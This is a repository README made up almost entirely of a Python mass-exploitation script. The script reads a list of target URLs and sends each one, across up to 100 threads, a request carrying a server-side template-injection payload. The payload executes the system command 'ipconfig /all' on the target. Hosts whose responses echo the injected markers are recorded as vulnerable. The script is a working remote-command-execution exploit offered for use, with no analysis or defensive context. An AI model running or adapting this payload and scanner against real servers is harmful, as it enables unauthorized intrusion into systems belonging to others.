README.md
Rendering markdown...
#!/usr/bin/python3
from random import random
import requests
import threading
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
file_lock = threading.Lock()
# WRITE_URL
def write_to_file(data):
with file_lock:
with open("vul_url", "a+") as file:
file.write(data + "\n")
def run(url):
try:
vul_url = url + """/?s=%0A&cmd=ipconfig+/all&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}"""
res = requests.get(url=vul_url, proxies={'http':'http://127.0.0.1:7890'})
# SSTI->
# <.....'RESULT'>
# RESULT:
# System infomation
# If the site is vulnerable, the echo message will contain multiple "RESULT"
if res.text.count('RESULT') >= 2:
print(f"{url} is vulnerbale")
write_to_file(url)
except Exception as e:
print(e)
return None
max_threads = 100
semaphore = threading.Semaphore(max_threads)
class MyThread(threading.Thread):
def __init__(self, url):
super().__init__()
self.url = url
def run(self):
try:
run(self.url)
except requests.exceptions.RequestException as e:
return None
semaphore.release()
def print_ascii_art():
print("""
██████ ██ ██ ███████ ██████ ██████ ██████ ██ ██ ██████ ██████ ██████ █████ ██████
██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ █████ █████ █████ ██ ██ ██ █████ ███████ █████ █████ █████ ███████ ██████ █████
██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██
██████ ████ ███████ ███████ ██████ ███████ ██ ███████ ██████ ██████ █████ ███████ @Leviathan
""")
def main():
print_ascii_art()
print("Script is running!")
# OPEN URL FILE
with open("xxx.txt", "r") as file:
urls = file.readlines()
threads = []
for url in urls:
semaphore.acquire()
thread = MyThread(url.strip())
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
if __name__ == "__main__":
main()